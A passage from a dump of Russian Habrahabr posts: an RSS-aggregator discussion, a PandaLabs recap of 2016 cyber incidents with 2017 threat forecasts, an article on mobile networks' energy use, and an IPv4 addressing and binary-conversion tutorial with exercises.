[2] http://www.elbrus.ru/arhitektura_elbrus .
[3] http://www.mcst.ru/mikroprocessor-elbrus4s .
[4] http://www.mcst.ru/vysokoproizvoditelnye_biblioteki .
[5] Крис Касперски. “Технологии оптимизации программ. Эффективное использование памяти”. Спб.: БХВ-Петербург, 2003. ISBN 5-94157-232-8 – 464 С. | https://habrahabr.ru/company/smartengines/blog/317672/ |
habrahabr | Один инструмент для всех подписок — рассылки, RSS, телеграм-каналы, страницы в соцсетях | ['RSS', 'рассылки', 'телеграм', 'соцсети', 'информационные потоки', 'подписки'] |
Я люблю RSS, пользуюсь им уже лет десять, и накопил 400 фидов. До недавнего времени он меня полностью устраивал. Но за последние два года я подписался на несколько рассылок, двадцать каналов... | Я люблю RSS, пользуюсь им уже лет десять, и накопил 400 фидов. До недавнего времени он меня полностью устраивал. Но за последние два года я подписался на несколько рассылок, двадцать каналов в Телеграме, еще десяток компаний в Фейсбуке и даже три паблика Вконтакте. И теперь всё это добро валится на меня со всех сторон и мешает жить. Мешает, потому что я хочу использовать соцсети и мессенджеры для общения со знакомыми, а не для информационных подписок. Я понял, что хочу RSS-ридер, только для любых источников: собственно RSS, телеграм-каналы, соцсети и, возможно, емейл. Примерно такой: Один ридер. Любые информационные подписки Кажется, интерфейс RSS-ридера намного лучше подходит для «потребления» информации, чем телеграм, фейсбук и даже почтовый клиент. Заодно перенос информационных подписок в отдельный инструмент разгрузит ленту соцсетей и телеграм (в котором из-за каналов вечно болтается over 9000 непрочитанных «сообщений»). Альтернативный вариант — вынести все подписки не в отдельный ридер, а просто в почту. То есть сделать сервис, который слушает соцсети, телеграм и RSS, готовит из них ежедневные дайджесты, и присылает на электронную почту. Мне лично этот подход меньше нравится, потому что RSS-ридер для чтения удобнее почты. Но встречал людей, которые категорически за почту. А вы что думаете? Хотите один инструмент для всех информационных подписок? Или, может быть, решили для себя проблему разнородных источников информации как-то иначе? Или это для вас вообще не проблема? Поделитесь в комментариях. P. S. Поставил заметку в «Я пиарюсь», потому что не нашел, куда еще. Но в данном случае я не «продать» хочу, а узнать ваше мнение. Где, как не на Хабре спрашивать о таких гиковских штуках ツ Оригинал комикса | https://habrahabr.ru/post/317642/ |
habrahabr | Прогнозы на 2017 год: меньше вредоносных программ, но более эффективные атаки | ['информационная безопасность', 'кибербезопасность', 'антивирусная защита', 'panda security', 'pandalabs', 'прогноз 2017', 'трояны', 'шифровальщики', 'киберугрозы'] |
Подходит к концу 2016 год, когда мы в изобилии наблюдали громкие атаки, от которых страдали крупные компании и частные пользователи. Атаки таких шифровальщиков как Petya, троянов типа Gugi для... |
Подходит к концу 2016 год, когда мы в изобилии наблюдали громкие атаки, от которых страдали крупные компании и частные пользователи. Атаки таких шифровальщиков как Petya, троянов типа Gugi для Android, шпионов аналогичных Pegasus, PunkeyPOS, или масштабные атаки, направленные на терминалы оплат, вместе с недавними DDoS-атаками нанесли огромный ущерб крупным корпорациям и международным коммуникационным сетям.
Антивирусная лаборатория PandaLabs компании Panda Security представляет список того, что нам следует ожидать в наступающем 2017 году. АНАЛИЗ
Этот год начался с более чем 20 миллионов новых образцов вредоносных программ, обнаруженных и нейтрализованных в PandaLabs (в среднем — 227 000 в день). Это чуть больше, чем в первом квартале 2015 года (в среднем — 225 000 в день). В течение 2016 года мы видели, как количество новых образцов стало чуть меньше, чем годом ранее: в среднем до 200 000 в день. Хотя атаки стали более эффективными.
Кибер-преступники стали все более уверенными в своих силах, и даже несмотря на то, что мы заканчиваем год с более оптимистическими показателями, мы все равно не можем терять бдительность. Хакеры концентрируют свои усилия на более прибыльных атаках, совершенствуя свою тактику, что позволяет им получать быстрые и легкие деньги более эффективно. Хакеры переключили свое внимание на организации, которые обрабатывают огромные объемы данных, особенно персональной информации (больницы, фармацевтика, отели и т.д.). Как только они получают доступ к таким организациям, они заражают максимально возможное число компьютеров с помощью шифровальщиков, в результате чего могут требовать от своих жертв любые деньги в виде выкупа или продавать эти данные на «черном рынке».
Если что и не изменилось в этом году, так это класс наиболее популярных вредоносных программ — речь идет про трояны, которые вкупе с шифровальщиками продолжают оставаться на вершине «рейтинга» уже многие годы. РЕЙТИНГ АТАК 2016 ГОДА Шифровальщики
Мы знаем, что шифровальщики — это серьезный бизнес у кибер-преступников, но его невероятно сложно измерить с высокой степенью достоверности. Мы видели эволюцию таких атак, наряду с такими усовершенствованиями, как прямой чат жертвы с хакерами для «обсуждения» платежей. Техники также стали более совершенными, а иногда они особенно агрессивны, как в случае с Petya, который вместо шифрования документов поражает сразу главную загрузочную запись (MBR) компьютера и делает его непригодным до уплаты выкупа. Также все чаще мы видим злоупотребления системной утилитой PowerShell (что мы прогнозировали в ежегодном отчете PandaLabs за 2015 год), установленной по умолчанию в Windows 10 и часто используемой при атаках во избежание обнаружения со стороны решений безопасности, установленных на компьютерах жертв. Во втором квартале мы видели одну из самых странных атак шифровальщика на компанию из Словении. Ее руководитель службы безопасности получил письмо из России, сообщающее о том, что их сеть взломана, и вскоре на всех их компьютерах будет запущен шифровальщик, если они не заплатят примерно 9000 евро (в биткоинах) в течение 3 дней. Чтобы доказать наличие доступа к сети, хакеры прислали им список всех устройств, подключенных к внутренней сети компании.
Конечно, многие жертвы предпочли заплатить выкуп, хотя восстановление данных при этом не гарантируется. В третьем квартале мы наблюдали более высокие уровни специализации на атаках шифровальщиками.
Лучший пример этого показали создатели шифровальщиков Petya и Mischa, которые специализировались на разработке вредоносного ПО и соответствующих платежных платформ, передав вопросы распространения третьим лицам — такая практика была названа Ransom as a Service (RaaS) . По сути, после того как они сделали свою часть работы, они привлекли дистрибьюторов для заражения жертв. Все как в легальном бизнесе: прибыль дистрибьюторов зависит от объема «заработанных» денег. Чем выше продажи, тем выше процент, который они получают. Вредоносная почта
Атаки приходят не только со стороны вредоносной рекламы или взломанных сайтов. Огромное количество атак все еще осуществляется через электронную почту в виде ложных счетов или различных уведомлений.
Подобная атака была проведена как минимум в двух странах Европы — в Польше и Испании, где хакеры выдавали себя за местные электрокомпании. В их сообщении не было вложений, а была только платежная информация в виде текста и ссылка для просмотра более детальной информации.
Подвох заключался в непомерно высоких суммах в счете, которые заставляли получателя возмущаться и, не думая, нажимать на ссылку для просмотра детализации. При нажатии на ссылку пользователь направлялся на ложный сайт, сильно похожий на реальный сайт обслуживающей его энергокомпании, где он мог скачать счет. Если клиент скачивал и открывал файл, то он заражался шифровальщиком. Внутрикорпоративный фишинг
Этот вид атак стремительно набирает популярность. Хакеры якобы от лица президента или финансового директора компании запрашивают трансфер у сотрудника. Прежде, чем сделать это, они изучают работу компании изнутри, получая информацию о своих жертвах через соцсети, что делает их аферу более правдоподобной.
Яркий пример этого года — инцидент в компании Mattel , известном производителе Barbies и Hot Wheels.
Высокопоставленный руководитель получил сообщение от недавно назначенного руководителя компании с заданием на перевод 3 млн. долларов США на банковский счет в Китае. После того как трансфер был осуществлен, он сообщил руководителю, что все сделано. Тот был ошарашен этим, потому что никакого задания на трансфер он ему не давал. Они срочно обратились в госорганы США и банк, но было слишком поздно, т.к. деньги уже были переведены.
Однако им повезло: у банка в Китае был выходной день, а потому у них было достаточно времени, чтобы предупредить китайские власти. Счет был заморожен, и Mattel сумел вернуть свои деньги. Мобильные устройства
SNAP — одна из самых популярных уязвимостей этого года. От нее пострадали мобильные телефоны LG G3. Проблема происходила из ошибки в приложении Smart Notice, предоставлящей права на запуск любого JavaScript. В BugSec обнаружили эту уязвимость и сообщили в LG, которая оперативно опубликовала патч для устранения проблемы. Gugi, троян под Android , сумел преодолеть барьеры безопасности в Android 6 для кражи банковских регистрационных данных из приложений, установленных на телефоне. Для этого поверх окна легитимного приложения
Gugi накладывал свое окно, запрашивая банковские данные пользователя, которые без его ведома отправлялись непосредственно кибер-преступникам.
В августе компания Apple опубликовала срочное обновление своей операционной системы для мобильных устройств iOS 9.3.5. В нем устранялись три уязвимости «нулевого дня», использующиеся шпионским ПО, известным как Pegasus , разработанным израильской компанией NGO Group, которая выпускает продукты, аналогичные решениям компании Hacking Team. Интернет вещей
Автомобильный сектор очень подвержен риску. Сотрудники Университета из Бирмингема показали, как они могут взламывать систему блокировки дверей любой машины, проданной Volkswagen Group за последние 20 лет. Чарли Миллер и Крис Валашек, которые ранее взламывали Jeep Cherokee, пошли еще дальше и показали, как они могут манипулировать дроссельной заслонкой, тормозами и даже рулем движущегося автомобиля.
«Умные дома» также уязвимы перед кибер-атаками. Исследователь Эндрю Тирни показал разработанный им способ взлома термостата. После того как он смог получить контроль над ним (вставив в него SD-карту), он поднял температуру до 99 градусов по Фаренгейту и запросил PIN-код для деактивации. Термостат подключался к IRC-каналу, предоставляя MAC-адрес в виде идентификатора каждого скомпрометированного устройства. У пользователя запрашивался биткоин в обмен на PIN-код, который менялся каждые 30 секунд. Кибер-войны
В сфере кибер-войн, 2016 показал, что США решили пойти в атаку, признавшись в запуске кибер-атак на ИГИЛ. Роберт Уорк, заместитель министра обороны США предельно ясно об этом сказал в интервью CNN.
В июне власти Южной Кореи раскрыли атаку со стороны КНДР . Предположительно, атака началась примерно год назад, и ее основной целью стали 140 000 компьютеров, принадлежащих организациям и государственным органам, а также оборонным предприятиям. Но данная атака была обнаружена только в феврале этого года. По заявлению полиции, было украдено свыше 42000 документов, из которых 95% были связаны с вопросами обороны, такими как, например, документы по планам и спецификациям на истребитель F35.
В разгар президентских выборов в США одним из наиболее актуальных обнаруженных инцидентов стало раскрытие атаки на Национальный комитет Демократической партии США (Democratic National Commettee), в результате чего были украдены огромные объемы данных, ставших впоследствии достоянием общественности.
Продолжая тему выборов, ФБР предупредило об обнаружении двух атак на сайты, связанные с выборами. При этом как минимум один из хакеров (иностранец) сумел снять с регистрации некоторых избирателей.
В августе группа, именующая себя как «The Shadow Brokers», объявила, что она взломала АНБ , и опубликовала некоторые виды украденного «кибер-оружия», обещая продать остальные образцы. Кибер-преступления В июне преступник, которого окрестили «Властелин тьмы», выставил на продажу на черном рынке информацию о пациентах трех институтов из США.
Он украл информацию о более чем 650 000 пациентов и запросил за них порядка 700 000 долларов США. Вскоре после этого он выставил на продажу персональные данные 9,3 миллионов клиентов агентства медицинского страхования за 750 биткоинов (примерно 0,5 млн. долларов).
В последние месяцы Dropbox также стал жертвой кибер- преступников. Недавно стало известно, что популярный файлообменный сервис подвергся атаке в 2012 году. Итог: кража данных 68 миллионов пользователей.
Но если о каком грабеже и говорить, то это об инциденте с Yahoo. Хотя он произошел еще в 2014 году, но об этом стало известно совсем недавно. Всего было скомпрометировано
500 млн. аккаунтов, что стало крупнейшей кражей в истории.
2 августа произошла одна из крупнейших биткоин-краж в истории. Компания Bitfinex, которая занимается торговлей и обменом криптовалюты, стала жертвой атаки, в результате которой была украдена сумма, равная 60 млн. долларам.
Эти деньги принадлежали клиентам, которые хранили свои биткоины в этом «банке».
До сих пор нет улик, указывающих на преступников, и компания пока не предоставляет какой-либо информации о произошедшем, т.к. правоохранительные органы до сих пор проводят расследование. DDoS-атаки
В сентябре известный журналист в сфере безопасности Брайан Кребс раскрыл vDOS — «компанию», которая предлагала услуги DDoS- атак. Вскоре после этого были арестованы организаторы, которые за 2 года провели 150 000 атак и заработали 618 тысяч долларов.
Затем веб-сайт Кребса подвергся сокрушительной DDoS- атаке, которая отключила его на неделю. В конце концов, Google, в рамках своего Project Shield, сумел защитить его сайт, после чего он снова стал доступен в онлайне.
В последнем квартале года прокатилась волна масштабных кибер-атак против американского интернет-провайдера DynDNS, от которых пострадали веб-сайты многих крупных глобальных корпораций и международных коммуникационных средств, таких как Netflix, Twitter, Amazon и The New York Times.
Обслуживание было прервано почти на 11 часов, от чего пострадало свыше миллиарда пользователей. POS-терминалы и банковские карты
Популярная сеть быстрого питания Wendy’s столкнулась с заражением вредоносными программами свыше 1000 своих PoS-терминалов, из-за чего была украдена информация о банковских картах ее клиентов.
В PandaLabs обнаружили эту атаку, выполненную с помощью известной угрозы PunkeyPOS, которая использовалась для заражения свыше 200 ресторанов в США. Еще одна подобная атака была обнаружена нашей лабораторией в этом году. И снова пострадали рестораны в США: примерно 300 учреждений, чьи POS-терминалы были заражены с помощью вредоносной программы PosCardStealer. Финансовые учреждения
В этом году Центральный банк Бангладеша стал жертвой атаки, в ходе которой были сделаны трансферы на 1 млрд. долларов.
К счастью, удалось большую часть этих переводов заблокировать, хотя преступники все же смогли украсть около 81 миллиона долларов США.
Вскоре после этого мы наблюдали еще два аналогичных случая: один был против банка во Вьетнаме, а второй — против банка в Эквадоре. Социальные сети
Безопасность 117 миллионов пользователей LinkedIn была подвержена риску после того, как был опубликован список адресов электронной почты и их соответствующие хэши паролей. 32 миллиона логинов и паролей пользователей Twitter были выставлены на продажу примерно за 6000 долларов.
Эта социальная сеть отрицает, что информация по аккаунтам была получена с их серверов. На самом деле, пароли были представлены в виде текста и большинство из них принадлежали пользователям из России, и есть подозрение, что они были получены в результате фишинга или с помощью троянов.
Кстати, был атакован MySpace, хотя он практически уже не используется. Атака произошла в 2013 году, хотя до мая этого года о ней ничего не было известно. Были украдены имена пользователей, пароли и адреса электронной почты у примерно 360 миллионов пользователей.
Пострадавший пользователь может уже годами не пользоваться MySpace, но если у него есть привычка использовать одинаковый пароль, то сейчас самое время отказаться от нее и включить двухступенчатую авторизацию.
Использование двухступенчатой авторизации, создание сложных паролей и запрет на использование одинаковых паролей на разных веб-сайтах — вот основные советы по информационной безопасности, которые должны быть приняты во внимание. КАКИЕ КИБЕР- КОШМАРЫ ГОТОВИТ НАМ 2017 ГОД? Шифровальщики
В течение 2016 года они были в центре внимания, и скорее всего так будет и в 2017 году. В некотором роде, этот вид атаки заменил собой другие, более традиционные способы кражи информации. Шифровальщики позволяют намного проще «зарабатывать» деньги, исключая посредников и нежелательные риски. Атаки на компании
Атаки на компании будут более многочисленными и сложными.
Компании уже стали первоочередной целью для кибер- преступников. Их информация более ценна по сравнению с данными частных пользователей.
Кибер-преступники всегда ищут слабые места в корпоративных сетях, чтобы проникнуть в них. После этого они получают доступ к ресурсам, которые содержат искомую информацию. Они могут также запустить масштабные атаки с помощью шифровальщиков, заражающих все доступные устройства, чтобы потом запросить астрономические суммы денег за восстановление данных. Интернет вещей
Интернет вещей (IoT) — это следующий кошмар информационной безопасности. Любой вид устройств, подключенных к сети, может быть использован для того, чтобы проникнуть в корпоративные сети. Большинство таких устройств не имеют должного уровня безопасности.
Как правило, они не получают автоматические обновления безопасности, используют слабые пароли, причем часто на тысячах устройств используются одинаковые пароли по умолчанию и т.д. Все это вместе делает их очень уязвимыми для внешних атак. DDoS
В последние месяцы 2016 года мы стали свидетелями наиболее мощных в истории DDoS-атак. Они начались в сентябре с атаки на Брайана Кребса после того, как он сообщил о деятельности израильской компании, которая предлагает услуги по запуску таких атак.
Другая крупная атака была проведена против французской компании OVH (трафик — до 1 ТБ/сек), а еще одна — против американской компании Dyn, которая оставила несколько крупных интернет-гигантов без интернет-сервисов.
Эти атаки были совершены бот-сетями, в основе которых лежали тысячи зараженных IoT-устройств (IP-камеры, роутеры и пр.). Мы можем быть уверены в том, что в 2017 году мы увидим рост числа подобных атак, которые обычно используются для нанесения ущерба деловой репутации компаний или для блокировки ее деятельности (блокируя доступ к Интернету, затрудняя онлайн-продажи и пр.). Мобильные телефоны
Здесь цель вполне понятна: больше всего достанется устройствам Android. Не секрет, что Android имеет самую большую долю рынка, а эта операционная система установлена на большинстве устройств. Apple сохраняет скромную долю с iOS, а остальные системы имеют незначительную долю рынка. Кибер-преступникам будет проще сфокусироваться на одной операционной системе, чтобы достичь максимальных прибылей.
Решение проблемы зависит не только от того, что может сделать Android с помощью своевременных обновлений, но еще и от того, как каждый из производителей мобильных устройств решит, когда и как их включить в свой пакет (если вообще делать это). Учитывая количество инцидентов, возникающих ежемесячно, такая ситуация только повышает риски у пользователей. Кибер-войны
Мы переживаем один из наиболее сложных этапов развития международных отношений за последние годы: угрозы торговых войн, шпионаж, конфронтация между ведущими державами. Все это, несомненно, может иметь тяжелые и серьезные последствия в сфере кибер- безопасности.
Правительства разных стран стремятся получить доступ к еще большим объемам информации (в то время, когда шифрование становится все более популярным), а потому спецслужбы будут еще более заинтересованы в том, чтобы получать информацию, которая может принести пользу промышленности своих стран.
Такая глобальная тенденция может препятствовать инициативам по обмену данными, которыми уже обмениваются крупные компании, чтобы лучше защитить себя от кибер-преступников, внедряя стандарты и международные правила взаимодействия. | https://habrahabr.ru/company/panda/blog/317674/ |
habrahabr | Сила тока: как мобильная связь изменила наше отношение к энергоресурсам | ['энергопотребление'] |
(с) The Huffington Post UK
Электричество — это ресурс, о котором мы редко задумываемся. Розетки есть в каждой квартире, в каждом доме, в поездах, самолетах. Созданы миллиарды гаджетов,... | (с) The Huffington Post UK
Электричество — это ресурс, о котором мы редко задумываемся. Розетки есть в каждой квартире, в каждом доме, в поездах, самолетах. Созданы миллиарды гаджетов, потребляющих электричество, в том числе мобильные телефоны и смартфоны. Eсли батарея разряжена, а поблизости нет розеток, мы волнуемся.
Ждет ли нас электрический голод из-за мобильных телефонов и как мы будем с ним бороться, рассуждаем под катом. Сколько «ест» телефон
Еще в 2013 году подсчитали , что на долю информационных технологий приходится 10% мирового потребления электроэнергии. По данным Digital Power Group, на использование одного смартфона тратится не менее 361 кВт*ч в год (с учётом беспроводных подключений, передачи данных и зарядки аккумулятора). А холодильник средних размеров потребляет всего около 322 кВт*ч в год. (с) http://mosafernameh.com/ . Если в розетке закончилось электричество, то на помощь всегда придёт лимон. Сок лимона работает как электролит для двух металлических электродов — никелевого и медного. Впрочем, чтобы хотя бы начать зарядку телефона, понадобится минимум 17 лимонов.
На одного пользователя мобильной связи в мире приходится около 10-17 кВт*ч в год (в расчете на один смартфон). А есть ещё много устройств, включая зарядку для телефона, которые часто остаются в сети и продолжают потреблять электричество !
Согласно расчётам трёхлетней давности , в инфраструктуре обеспечения мобильной связи будут задействованы крупные дата-центры, хранящие, передающие и обрабатывающие данные (250—350 ТВт*ч в год), проводные и беспроводные сети различных типов, включая сотовые (250—600 ТВт*ч), пользовательское оборудование (460—1 200 ТВт*ч), заводы, на которых выпускается вся электроника, использующаяся в этой инфраструктуре (560—800 ТВт*ч). Итого 1 100—2 800 ТВт*ч (то есть не менее 1000 ТВт*ч). И если уровень потребления электроэнергии мобильными устройствами за три года практически не изменился (хотя количество устройств выросло), то мобильный трафик растёт в среднем по миру на 53% в год. Нельзя сказать, что потребление электроэнергии в индустрии увеличивается такими же темпами, однако связь с ростом энергозатрат, безусловно, есть. Какая она сейчас и какой будет к 2020 году — интересный вопрос для исследователей. Что ждет в будущем? Cisco Visual Networking Index (VNI) — Прогноз увеличения мирового мобильного трафика с 2015 по 2020 годы .
Если темпы роста количества пользователей не изменятся, к 2020 году в мире будет 5,4 млрд абонентов мобильной связи и более 10 млрд умных устройств, способных подключаться к мобильным сетям. Для сравнения: только 5,3 млрд жителей будут иметь доступ к электроэнергии, и 3,5 млрд — к централизованному водоснабжению. К слову, уже сейчас в Уганде (Восточная Африка) освещение в домах есть лишь у 3 млн человек, а мобильные телефоны — у 10 миллионов. Источник данных: Cisco .
Потребление энергии увеличится и благодаря изменению способов использования мобильных устройств. Обычная голосовая связь уходит в прошлое, вытесняемая различными интернет-коммуникациями. Среди всех приложений на первое место по темпам роста выходит мобильное видео. Уже через два года, по данным Cisco , доля 4G-соединений превысит 2G, а к 2020 году на 4G будет приходиться львиная доля всего мобильного трафика (превысив в шесть раз трафик предыдущих поколений связи). Для сравнения: доля 4G в России в прошлом году занимала 16,5% рынка мобильной связи.
Этот прогноз не учитывает того, что к 2020 году ожидается повсеместное распространение 5G. Сопоставив прогноз по трафику 4G с возможностями 5G (в котором объём и скорость передачи данных многократно возрастут), мы получим цифры на отметках в сотни экзабайт данных мобильного трафика. Вся эта информация будет циркулировать в сети из миллиардов подключённых — и потребляющих электроэнергию — устройств.
За десять лет мобильный трафик вырастет более чем в 100 раз. Причём, мобильный трафик будет расти вдвое быстрее трафика от фиксированных IP-адресов. А точки Wi-Fi-доступа добавят в общий поток ещё несколько десятков экзабайт данных. Базовые станции
Конечные мобильные устройства — это лишь вершина айсберга. Необходимо обеспечивать электропитанием все базовые станции, благодаря которым работает сотовая связь. Количество потребляемой электроэнергии зависит от многих факторов, но можно дать приблизительные оценки. Раньше у базовой станции, работающей по стандарту 2G, полезное потребление составляло 720 Вт (18 передатчиков по 40 Вт), плюс питание вентиляторов охлаждения. А сегодня актуальная мощность технологического оборудования при полной нагрузке может составлять 5 кВт, и еще 1,6 кВт приходится на кондиционер аппаратного шкафа.
Для зарядки мобильных устройств, на первый взгляд, нужно немного энергии. Но если за неделю у вас набегает один час просмотра видео на смартфоне, то за год тратится больше энергии, чем на работу двух холодильников. Здесь учитывается не только зарядка аккумулятора, но и суммарные энергозатраты сотовой и вычислительной инфраструктуры.
При этом вообще не важно, какой телефон вы используете и сколько энергии потребляет базовая станция 2G/3G/4G. Важно лишь то, какой контент вы потребляете. Ресурсами созданного в IBM Research квантового процессора на пять кубитов можно пользоваться с любого мобильного устройства, не говоря уже об обычных услугах облачных вычислений. Вся огромная инфраструктура мобильного доступа требует гигантских центров обработки данных по всему миру, с каждым годом потребляющих всё больше электроэнергии. Электричество как валюта
Насколько ценным ресурсом становится электричество для операторов и других компаний, наглядно иллюстрирует история, которая случилась в Кении.
M-Pesa — сервис мобильных денег (позволяет переводить деньги на счёт телефона и совершать с его помощью покупки) был запущен кенийским оператором Safaricom, который в свою очередь является дочкой Vodafone. В Кении у M-Pesa более 15 млн абонентов и практически нет конкурентов. На основе M-Pesa быстро развился сервис M-Kopa, позволяющий покупать в рассрочку солнечные батареи. Весьма актуальная услуга там, где развивается мобильная связь, но при этом крайне плохо обстоят дела с обычным проводным электричеством. Всю суть проблемы можно передать одним новостным заголовком: «Причиной широкомасштабного отключения электричества в Кении стала обезьяна». Лучшим решением в этих условиях является солнечная батарея, от которой не только можно запитать телефон, но и вернуть себе «кошелёк с деньгами». Однако SIM-карта, которая ставится внутрь солнечных батарей, может по требованию оператора удаленно отключать электричество абоненту, если тот просрочил платёж. То есть вы можете остаться в пустыне без электричества, денег и связи, если вовремя не положите деньги на счёт. Итоги: (пока) без энергетического голода
Необходимость заряжать телефон лишь подогревает интерес к альтернативным источникам энергии в регионах, где сложно получить доступ к электричеству в розетке. Что касается потребления энергии в развитых странах, здесь отмечается новый тренд: использование технологий, которые позволяют обмениваться данными при минимальных энергозатратах. К примеру, инженеры из Вашингтонского университета продемонстрировали систему Passive Wi-Fi, позволяющую обмениваться данными, тратя на это в 10 000 раз меньше энергии. | https://habrahabr.ru/company/yota/blog/317634/ |
habrahabr | Основы компьютерных сетей. Тема №5. Понятие IP адресации, масок подсетей и их расчет | ['cisco', 'ccna', 'vlsm', 'classful', 'classless', 'ipv4', 'address plan', 'summarization', 'классовая адресация', 'бесклассовая адресация', 'суммирование подсетей'] |
Приветствую вас на очередном выпуске. И сегодня речь пойдет о том, какие бывают IP-адреса, и как ими пользоваться. Что такое маска подсети, как она считается, и для чего она нужна. Как делить... |
Приветствую вас на очередном выпуске. И сегодня речь пойдет о том, какие бывают IP-адреса, и как ими пользоваться. Что такое маска подсети, как она считается, и для чего она нужна. Как делить сети на подсети и суммировать их. Заинтересовавшихся приглашаю к прочтению. Содержание 1) Основные сетевые термины, сетевая модель OSI и стек протоколов TCP/IP.
2) Протоколы верхнего уровня.
3) Протоколы нижних уровней (транспортного, сетевого и канального).
4) Сетевые устройства и виды применяемых кабелей.
5) Понятие IP адресации, масок подсетей и их расчет.
6) Понятие VLAN, Trunk и протоколы VTP и DTP.
7) Протокол связующего дерева: STP.
8) Протокол агрегирования каналов: Etherchannel.
9) Маршрутизация: статическая и динамическая на примере RIP, OSPF и EIGRP.
10) Трансляция сетевых адресов: NAT и PAT.
11) Протоколы резервирования первого перехода: FHRP.
12) Безопасность компьютерных сетей и виртуальные частные сети: VPN.
13) Глобальные сети и используемые протоколы: PPP, HDLC, Frame Relay.
14) Введение в IPv6, конфигурация и маршрутизация.
15) Сетевое управление и мониторинг сети.
P.S. Возможно, со временем список дополнится.
Начнем, или уже продолжим, с самого популярного, заезженного и больного. Это IP-адреса. На протяжении 4-х статей это понятие встречалось по несколько раз, и скорее всего вы уже либо сами поняли для чего они, либо нагуглили и почитали о них. Но я обязан вам это рассказать, так как без ясного понимания двигаться дальше будет тяжело.
Итак IP-адрес — это адрес, используемый узлом на сетевом уровне. Он имеет иерархическую структуру. Что это значит? Это значит, что каждая цифра в его написании несет определенный смысл. Объясню на очень хорошем примере. Примером будет номер обычного телефона — +74951234567. Первой цифрой идет +7. Это говорит о том, что номер принадлежит зоне РФ. Далее следует 495. Это код Москвы. И последние 7 цифр я взял случайными. Эти цифры закреплены за районной зоной. Как видите здесь наблюдается четкая иерархия. То есть по номеру можно понять какой стране, зоне он принадлежит. IP адреса придерживаются аналогично строгой иерархии. Контролирует их организация IANA(англ. Internet Assigned Numbers Authority). Если на русском, то это «Администрация адресного пространства Интернет». Заметьте, что слово «Интернет» с большой буквы. Мало кто придает этому значение, поэтому объясню разницу. В англоязычной литературе термин «internet» используется для описания нескольких подключённых друг к другу сетей. А термин «Internet» для описания глобальной сети. Так что примите это к сведению.
Несмотря на то, что тема статьи больше теоретическая, нежели практическая, я настоятельно рекомендую отнестись к ней со всей серьезностью, так как от нее зависит понимание дальнейших тем, а особенно маршрутизации. Не для кого, я думаю, не секрет, что мы привыкли воспринимать числовую информацию в десятичном формате (в числах от 0-9). Однако все современные компьютеры воспринимают информацию в двоичном (0 и 1). Не важно при помощи тока или света передается информация. Вся она будет воспринята устройством как есть сигнал (1) или нет (0). Всего 2 значения. Поэтому был придуман алгоритм перевода из двоичной системы в десятичную, и обратно. Начну с простого и расскажу, как выглядят IP адреса в десятичном формате. Вся эта статья посвящена IP адресам версии 4. О версии 6 будет отдельная статья. В предыдущих статьях, лабах, да и вообще в жизни, вы видели что-то вроде этого «193.233.44.12». Это и есть IP адрес в десятичной записи. Состоит он из 4-х чисел, называемых октетами и разделенных между собой точками. Каждое такое число (октет) может принимать значение от 0 до 255. То есть одно из 256 значений. Длина каждого октета равна 8 битам, а суммарная длина IPv4 = 32 битам. Теперь интересный вопрос. Каким образом этот адрес воспримет компьютер, и как будет с ним работать?
Можно конечно набить это в калькулятор, коих навалом в Интернете, и он переведет его в двоичный формат, но я считаю, что переводить вручную должен уметь каждый. Особенно это касается тех, кто планирует сдавать экзамен. У вас не будет под рукой ничего, кроме бумаги и маркера, и полагаться придется только на свои навыки. Поэтому показываю, как это делать вручную. Строится таблица. 128
64
32
16
8
4
2
1
x
x
x
x
x
x
x
x
Вместо «x» записывается либо 1, либо 0. Таблица разделена на 8 колонок, каждая из которых несет в себе 1 бит (8 колонок = 8 бит = 1 октет). Расположены они по старшинству слева направо. То есть первый (левый) бит — самый старший и имеет номер 128, а последний (правый) — самый младший и имеет номер 1. Теперь объясню, откуда эти числа взялись. Так как система двоичная, и длина октета равна 8-ми битам, то каждое число получается возведением числа 2 в степень от 0 до 7. И каждая из полученных цифр записывается в таблицу от большего к меньшему. То есть слева направо. От 2 в 7-ой степени до 2 в 0-ой степени. Приведу таблицу степеней 2-ки.
Думаю теперь понятно, каким образом строится таблица. Давайте теперь разберем адрес «193.233.44.12» и посмотрим, как он выглядит в двоичном формате. Разберем каждый октет отдельно. Возьмем число 193 и посмотрим, из каких табличных комбинаций оно получается. 128 + 64 + 1 = 193. 128
64
32
16
8
4
2
1
1
1
0
0
0
0
0
1
Те числа, которые участвовали в формировании комбинации получают 1, а все остальные получают 0.
Берем первый октет 233. 128 + 64 + 32 + 8 + 1. 128
64
32
16
8
4
2
1
1
1
1
0
1
0
0
1
Для 44 — это 32 + 8 + 4. 128
64
32
16
8
4
2
1
0
0
1
0
1
1
0
0
И напоследок 12. 8 + 4. 128
64
32
16
8
4
2
1
0
0
0
0
1
1
0
0
Получается длинная битовая последовательность 11000001.11101001.00101100.00001100. Именно с данным видом работают сетевые устройства. Битовая последовательность обратима. Вы можете так же вставить каждый октет (по 8 символов) в таблицу и получить десятичную запись. Я представлю совершенно случайную последовательность и приведу ее к десятичному виду. Пусть это будет 11010101.10110100.11000001.00000011. Строю таблицу и заношу в нее первый блок. 128
64
32
16
8
4
2
1
1
1
0
1
0
1
0
1
Получаю 128 + 64 + 16 + 4 + 1 = 213.
Вычисляю второй блок. 128
64
32
16
8
4
2
1
1
0
1
1
0
1
0
0
Считаю 128 + 32 + 16 + 4 = 180.
Третий блок. 128
64
32
16
8
4
2
1
1
1
0
0
0
0
0
1
128 + 64 + 1 = 193.
И напоследок четвертый. 128
64
32
16
8
4
2
1
0
0
0
0
0
0
1
1
2 + 1 = 3
Собираем результаты вычислений и получаем адрес 213.180.193.3. Ничего тяжелого, чистая арифметика. Если тяжело и прям невыносимо трудно, то попрактикуйтесь. Сначала может показаться страшным, так как многие закончили учебу лет 10 назад и многое позабыли. Но уверяю, что как только набьете руку, считать будет гораздо легче. Ну а для закрепления дам вам несколько примеров для самостоятельного расчета (под спойлером будут ответы, но открывайте их только когда прорешаете сами). Задача №1
1) 10.124.56.220
2) 113.72.101.11
3) 173.143.32.194
4) 200.69.139.217
5) 88.212.236.76
6) 01011101.10111011.01001000.00110000
7) 01001000.10100011.00000100.10100001
8) 00001111.11011001.11101000.11110101
9) 01000101.00010100.00111011.01010000
10) 00101011.11110011.10000010.00111101 Ответы 1) 00001010.01111100.00111000.11011100
2) 01110001.01001000.01100101.00001011
3) 10101101.10001111.00100000.11000010
4) 11001000.01000101.10001011.11011001
5) 01011000.11010100.11101100.01001100
6) 93.187.72.48
7) 72.163.4.161
8) 15.217.232.245
9) 69.20.59.80
10) 43.243.130.61
Теперь IP-адреса не должны быть чем-то страшным, и можно углубиться в их изучение.
